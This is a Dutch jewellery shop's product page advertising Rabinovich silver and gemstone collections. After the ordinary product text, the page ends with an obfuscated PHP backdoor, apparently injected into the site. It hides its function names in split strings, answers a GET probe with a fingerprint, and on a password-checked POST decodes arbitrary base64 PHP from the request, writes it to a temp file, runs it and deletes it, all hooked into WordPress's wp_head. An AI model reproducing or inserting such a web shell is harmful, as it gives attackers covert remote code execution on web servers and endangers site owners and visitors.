Rabinovich-sieraden-koop-je-bij-Wolters-Juweliers-Coevorden-Emmen

Rabinovich sieraden vind je bij Wolters Juweliers Coevorden Emmen

Met veel trots presenteren wij de nieuwe collectie van Rabinovich van het najaar 2021. Ook dit seizoen heeft ontwerpster Jette Rabinovich zich volop laten inspireren door de natuur, een onuitputtelijke bron van inspiratie in vormen en details.

Daarnaast brengt de collectie veel kleur! Draag bijzondere edelstenen zoals Blauwe topaas, Chalcedoon en Roze opaal.
Elk sieraad van Rabinovich is het resultaat van een zorgvuldige zoektocht naar de perfectie van vorm en materiaal. Karakteristieke edelstenen, parels en zilver worden gebruikt om een ontwerp tot leven te brengen.

Authenticiteit en handwerk vormen de basis van de gehele collectie, gecreëerd met een intense passie voor edelsmederij. Bekijk de collectie bij Wolters Juweliers in onze winkel in Coevorden of Emmen.

Bekijk de nieuwste brochure van de voorjaarscollectie

Rabinovich-unieke-sieraden-verkrijgbaar-bij-Wolters-Juweliers-Coevorden-Emmen
Rabinovich--Caring-Nest-collectie-ring-hanger-en-oorbellen-Wolters-Juweliers-Coevorden-Emmen

Caring Nest

De serie Caring Nest is gemaakt van wit zilver met chalcedoon of hematiet en in verguld zilver met rozenkwarts of hermatiet. De sieraden zijn geïnspireerd op de liefde en warmte van het ´nest´ waar we ons geborgen en vertrouwd voelen. De handgemaakte serie bestaat uit een collier, een ring en oorhangers.

Silver Mist

Prachtige set van een collier en ring met sterling zilver met chalcadoon en blauwe topaas.

Nature, flowers and misty rain, always makes the mind wander. The life giving water helps everything grow and bring beauty to the world.

Rabinovich--silver-mist--collectie-ring-648-03-0-08-hanger-648-02-0-08--Wolters-Juweliers-Coevorden-Emmen
Rabinovich-Adorable-Lace-collectie-ring-649-03-0-44-collier-057-02-0-65-en-oorknop-649-05-0-44-Wolters-Juweliers-Coevorden-Emmen

Adorable Lace

De serie Adorable Lace bestaat uit een sterling zilveren met zirkonia ingezet collier, oorknoppen en een ring. Het korte collier bevat een witte zirkonia steen gecombineerd met een grote roze aventurijn of groene nefriet.

Andromeda collectie

Het ontwerpteam van Rabonivich heeft zich voor deze serie laten inspireren op de Andromeda, een sterrenbeeld aan de noordelijke hemelkoepel. Het dichtbijgelegen grote sterrenstelsel is op donkere nachten met het blote oog te zien. Ook de spiraalnevel wordt zichtbaar door een lijn van stofwolken in het vlak van de spiraalarmen. Dit is terug te zien in de sterling zilveren ring, oorknoppen en collier met blauwe topaas.

Rabinovich-Andromeda-collectie-collectie-ring-collier-en-oorknop-Wolters-Juweliers-Coevorden-Emmen

Over Rabinovich

Het verhaal achter de sieradenlijn is net een sprookje. De Argentijn Mario Rabinovich en de Deense Jette Poulsen ontmoetten elkaar tijdens een wereldreis en ze ontdekten behalve hun liefde voor elkaar, ook hun gedeelde passie voor bijzondere sieraden. Eenmaal samen aan de ontwerptafel leggen ze de basis voor het succesvolle merk en innovatief Deens design. Wolters Juweliers Coevorden Emmen is officieel dealer van Rabinovich sieraden, kom langs in onze winkel en bekijk de prachtige collectie van Rabinovich.

Over-Rabinovich-sieraden,-verkrijgbaar-bij-Wolters-Juweliers-Coevorden-Emmen

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}